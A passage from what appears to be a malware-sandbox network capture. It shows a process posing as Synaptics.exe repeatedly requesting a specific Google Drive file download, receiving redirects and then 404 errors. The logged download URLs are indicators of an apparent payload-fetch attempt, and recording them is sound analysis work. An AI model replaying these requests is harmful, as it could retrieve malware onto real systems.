                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-0HehSy6EwOHj1uW2O4VODg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                24192.168.2.449832142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:56 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:57 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:57 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-wKHkHncKrXVuy69UxIbRFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                25192.168.2.449852142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:00 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:01 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:01 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-AZZ7cu6h933vkv0kQeMUMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                26192.168.2.449851142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:00 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:01 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:01 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-L6drlEYQUO5bHMHxD5i_SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                27192.168.2.449870142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:04 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:05 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:05 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-_IdC4sBiiZiaj5N3hGWr3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                28192.168.2.449871142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:04 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:05 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:05 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-DOvgeX4v9yzYqpWvQ-RZIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                29192.168.2.449880142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:07 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:07 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-BB3vbpBwZBqmxM01jMah8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                30192.168.2.449882142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:07 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:08 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC6VFTziZmc-1Z9kBqSWv_iZRoUwfntOVECXnYRqZcaaQedZZ5fzbLyhLvQrksSI9kH0ncQcBXQ
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:07 GMT
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-tBPJd58qmnQfLVz_k7xn_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:08 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                2024-12-25 08:08:08 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 32 4d 69 4c 67 6d 55 51 41 64 64 68 61 35 36 64 66 48 4e 67 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="X2MiLgmUQAddha56dfHNgg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                2024-12-25 08:08:08 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                31192.168.2.449883142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:07 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:07 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-y1R7-EztHkhsLdsDW9RSZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                32192.168.2.449881142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:07 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:08 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC461AqJeNU0bsxLJDj9Nt4gB8pTcDSJfwIG2raq8eQslZnfZq6Mgdj1JHidaBxjrhSl
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:07 GMT
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Ys2MXjkiSQMH0IbFyxPaDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:08 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                2024-12-25 08:08:08 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 78 4b 5a 70 36 6f 34 70 7a 57 61 6f 31 37 70 53 30 32 46 53 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="jxKZp6o4pzWao17pS02FSw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
